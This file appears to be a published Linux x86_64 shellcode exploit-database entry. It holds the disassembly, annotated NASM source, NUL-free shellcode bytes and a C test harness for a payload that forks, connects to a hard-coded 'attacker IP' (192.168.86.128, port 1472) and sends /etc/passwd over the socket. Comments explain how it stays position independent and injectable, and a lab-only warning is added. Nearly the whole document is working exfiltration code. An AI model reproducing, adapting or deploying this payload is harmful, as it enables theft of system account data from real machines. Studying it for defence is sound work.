/*
# Title     : Linux x86_64 /etc/passwd file sender shellcode
# Date      : 28-06-2016
# Author    : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
*/
/*
Disassembly of section .text (objdump -d of the assembled NASM source below;
the <send> and <connect> labels are the NASM labels at those addresses):

0000000000400080 <_start>:
  400080:  48 31 c0                xor    %rax,%rax
  400083:  b0 39                   mov    $0x39,%al
  400085:  0f 05                   syscall
  400087:  99                      cltd
  400088:  48 39 d0                cmp    %rdx,%rax
  40008b:  74 07                   je     400094 <send>
  40008d:  48 31 c0                xor    %rax,%rax
  400090:  b0 3c                   mov    $0x3c,%al
  400092:  0f 05                   syscall

0000000000400094 <send>:
  400094:  b2 06                   mov    $0x6,%dl
  400096:  48 31 f6                xor    %rsi,%rsi
  400099:  48 ff c6                inc    %rsi
  40009c:  40 b7 02                mov    $0x2,%dil
  40009f:  48 31 c0                xor    %rax,%rax
  4000a2:  b0 29                   mov    $0x29,%al
  4000a4:  0f 05                   syscall
  4000a6:  4d 31 c0                xor    %r8,%r8
  4000a9:  49 89 c0                mov    %rax,%r8
  4000ac:  48 31 c0                xor    %rax,%rax
  4000af:  99                      cltd
  4000b0:  48 31 ff                xor    %rdi,%rdi
  4000b3:  48 31 f6                xor    %rsi,%rsi
  4000b6:  50                      push   %rax
  4000b7:  50                      push   %rax
  4000b8:  50                      push   %rax
  4000b9:  c6 04 24 02             movb   $0x2,(%rsp)
  4000bd:  66 c7 44 24 02 05 c0    movw   $0xc005,0x2(%rsp)
  4000c4:  c7 44 24 04 c0 a8 56    movl   $0x8056a8c0,0x4(%rsp)
  4000cb:  80
  4000cc:  48 89 e6                mov    %rsp,%rsi
  4000cf:  b2 10                   mov    $0x10,%dl
  4000d1:  4c 89 c7                mov    %r8,%rdi

00000000004000d4 <connect>:
  4000d4:  48 31 c0                xor    %rax,%rax
  4000d7:  b0 2a                   mov    $0x2a,%al
  4000d9:  0f 05                   syscall
  4000db:  4d 31 c9                xor    %r9,%r9
  4000de:  4c 39 c8                cmp    %r9,%rax
  4000e1:  75 f1                   jne    4000d4 <connect>
  4000e3:  48 31 c0                xor    %rax,%rax
  4000e6:  48 31 f6                xor    %rsi,%rsi
  4000e9:  50                      push   %rax
  4000ea:  50                      push   %rax
  4000eb:  50                      push   %rax
  4000ec:  c7 04 24 2f 65 74 63    movl   $0x6374652f,(%rsp)
  4000f3:  c7 44 24 04 2f 2f 70    movl   $0x61702f2f,0x4(%rsp)
  4000fa:  61
  4000fb:  c7 44 24 08 73 73 77    movl   $0x64777373,0x8(%rsp)
  400102:  64
  400103:  48 89 e7                mov    %rsp,%rdi
  400106:  b0 02                   mov    $0x2,%al
  400108:  0f 05                   syscall
  40010a:  48 89 c6                mov    %rax,%rsi
  40010d:  4c 89 c7                mov    %r8,%rdi
  400110:  99                      cltd
  400111:  66 41 ba 88 13          mov    $0x1388,%r10w
  400116:  48 31 c0                xor    %rax,%rax
  400119:  b0 28                   mov    $0x28,%al
  40011b:  0f 05                   syscall
  40011d:  48 31 c0                xor    %rax,%rax
  400120:  b0 3c                   mov    $0x3c,%al
  400122:  0f 05                   syscall
*/
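/*
 * NASM source of the payload; the assembled bytes are in shellcode[] below.
 * Stand-alone build:  nasm -felf64 sender.asm && ld -o sender sender.o
 *
 * Linux x86_64 syscall ABI: rax = number, args in rdi, rsi, rdx, r10, r8, r9,
 * result in rax (negative = -errno); the syscall instruction clobbers rcx/r11.
 * Syscall numbers used: 57 fork, 41 socket, 42 connect, 2 open, 40 sendfile,
 * 60 exit. The bytes are NUL-free and position independent (all data is built
 * on the stack, all jumps are relative), so they can be dropped anywhere.
 *
 * NOTE(review) — things a user of this payload should know:
 *  - mov dl,6 / mov dil,2 / mov r10w,5000 are partial-register writes and
 *    the full register is never cleared first, so the payload assumes the
 *    upper bytes of rdx, rdi and r10 are already zero (r10 in particular is
 *    never touched otherwise). That presumably holds at a freshly exec'd
 *    _start; it is not guaranteed when an arbitrary caller (e.g. the C harness
 *    below) jumps to the bytes. A preceding xor rdi,rdi / xor r10,r10 would
 *    remove the assumption.
 *  - socket(), open() and sendfile() results are never checked; a failure
 *    just falls through to exit.
 *  - `jnz connect` retries connect() forever, so a refused or unreachable
 *    listener leaves the child spinning on the (now failed) socket.
 *  - sendfile's count is 5000, so a /etc/passwd longer than 5000 bytes is
 *    sent truncated.
 *  - The parent's exit (and the child's final exit) pass whatever is in rdi
 *    as the status; only the low byte is visible to the waiter.
 *
 * section .text
 * global _start
 * _start:
 *     xor rax,rax
 *     mov al,57                   ; fork
 *     syscall
 *     cdq                         ; rdx = 0 when rax (pid) == 0, i.e. in the child
 *     cmp rax,rdx
 *     jz send                     ; child does the work
 *     xor rax,rax
 *     mov al,60                   ; parent exits
 *     syscall
 * send:
 * ;----------------
 * ;connecting to server
 * ;-------------------------
 * ;creating socket
 *     mov dl,6                    ; IPPROTO_TCP
 *     xor rsi,rsi
 *     inc rsi                     ; SOCK_STREAM
 *     mov dil,2                   ; AF_INET
 *     xor rax,rax
 *     mov al,41                   ; socket
 *     syscall
 * ;---------------------
 *     xor r8,r8
 *     mov r8,rax                  ;socket descriptor
 * ;----------------------------
 * ;connecting.............
 * ;struct sockaddr_in 16 bytes
 * ;sin_family 2 bytes
 * ;sin_port 2 bytes
 * ;sin_addr 4 bytes
 *     xor rax,rax
 *     cdq
 *     xor rdi,rdi
 *     xor rsi,rsi
 *     push rax
 *     push rax
 *     push rax                    ; 24 zero bytes of scratch for the struct
 *     mov [rsp],byte 2            ; sin_family = AF_INET
 *     mov [rsp+2],word 0xc005     ;port 1472 (change it if U want) — bytes 05 c0, network order
 *     mov [rsp+4],dword 0x8056a8c0 ;change it to attacker IP — bytes c0 a8 56 80 = 192.168.86.128
 *     mov rsi,rsp
 *     mov dl,16                   ; sizeof(struct sockaddr_in)
 *     mov rdi,r8
 * connect:
 *     xor rax,rax
 *     mov al,42                   ; connect
 *     syscall
 *     xor r9,r9
 *     cmp rax,r9
 *     jnz connect                 ; loop until connect() returns 0
 * ;------------------------------
 * ;opening /etc/passwd
 *     xor rax,rax
 *     xor rsi,rsi                 ; flags = O_RDONLY
 *     push rax
 *     push rax
 *     push rax
 *     mov [rsp],dword '/etc'
 *     mov [rsp+4],dword '//pa'    ; doubled slash pads the path to 12 bytes with no NUL
 *     mov [rsp+8],dword 'sswd'
 *     mov rdi,rsp
 *     mov al,2                    ; open
 *     syscall
 * ;----------------------
 * ;sending...............
 *     mov rsi,rax                 ;in_fd
 *     mov rdi,r8                  ;out_fd
 *     cdq                         ; offset pointer = NULL (rax is a small non-negative fd on success)
 *     mov r10w,5000               ; count
 *     xor rax,rax
 *     mov al,40                   ; sendfile
 *     syscall
 * ;--------------
 * ;exiting
 *     xor rax,rax
 *     mov al,60                   ; exit
 *     syscall
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* The 164 NUL-free bytes from the listing above, grouped by stage. */
char shellcode[] =
    /* fork; parent exits, child falls into send */
    "\x48\x31\xc0\xb0\x39\x0f\x05\x99\x48\x39\xd0\x74\x07"
    "\x48\x31\xc0\xb0\x3c\x0f\x05"
    /* socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) -> r8 */
    "\xb2\x06\x48\x31\xf6\x48\xff\xc6\x40\xb7\x02\x48\x31\xc0\xb0\x29\x0f\x05"
    "\x4d\x31\xc0\x49\x89\xc0"
    /* sockaddr_in on the stack: AF_INET, port 1472, 192.168.86.128 */
    "\x48\x31\xc0\x99\x48\x31\xff\x48\x31\xf6\x50\x50\x50"
    "\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xc0\xc7\x44\x24\x04\xc0\xa8\x56\x80"
    "\x48\x89\xe6\xb2\x10\x4c\x89\xc7"
    /* connect loop, repeated until it returns 0 */
    "\x48\x31\xc0\xb0\x2a\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x75\xf1"
    /* open("/etc//passwd", O_RDONLY) */
    "\x48\x31\xc0\x48\x31\xf6\x50\x50\x50"
    "\xc7\x04\x24\x2f\x65\x74\x63\xc7\x44\x24\x04\x2f\x2f\x70\x61"
    "\xc7\x44\x24\x08\x73\x73\x77\x64\x48\x89\xe7\xb0\x02\x0f\x05"
    /* sendfile(sock, fd, NULL, 5000) */
    "\x48\x89\xc6\x4c\x89\xc7\x99\x66\x41\xba\x88\x13\x48\x31\xc0\xb0\x28\x0f\x05"
    /* exit */
    "\x48\x31\xc0\xb0\x3c\x0f\x05";

/*
 * Test harness: prints the payload length, copies the bytes into an anonymous
 * read/write/execute mapping and jumps to them.
 *
 * The original harness jumped straight into shellcode[], which lives in the
 * writable .data section. Under NX/W^X that mapping is not executable and the
 * jump faults unless the binary is linked with -z execstack and the kernel
 * still turns that into read-implies-exec for the whole process; copying into
 * an explicitly PROT_EXEC mapping removes that dependency.
 *
 * WARNING: running this forks, and the child connects to the hard-coded
 * 192.168.86.128:1472 and streams /etc/passwd to it. Run only in an isolated
 * lab against a listener you control (e.g. `nc -l 1472`), and change the
 * address bytes first if that is not your listener.
 *
 * Build: gcc -o sender sender.c
 *
 * Returns: EXIT_FAILURE if the payload contains a NUL byte or the mapping
 *          fails; otherwise control passes to the payload, which ends with
 *          the exit syscall in both fork halves, so the final return is
 *          normally not reached.
 */
int main(void)
{
    size_t len = sizeof(shellcode) - 1;      /* drop the C string terminator */

    printf("shellcode length %ld\n", (long)strlen(shellcode));

    /* strlen() stopping early means an embedded NUL, which would truncate the
       payload in any string-based delivery (strcpy, argv, sprintf, ...). */
    if (strlen(shellcode) != len) {
        fprintf(stderr, "payload contains a NUL byte at offset %zu\n",
                strlen(shellcode));
        return EXIT_FAILURE;
    }

    void *exec = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec == MAP_FAILED) {
        perror("mmap");
        return EXIT_FAILURE;
    }
    memcpy(exec, shellcode, len);

    /* The payload is position independent, so running it from the fresh
       mapping is equivalent to running it in place. */
    ((void (*)(void))exec)();

    return EXIT_SUCCESS;                     /* normally not reached */
}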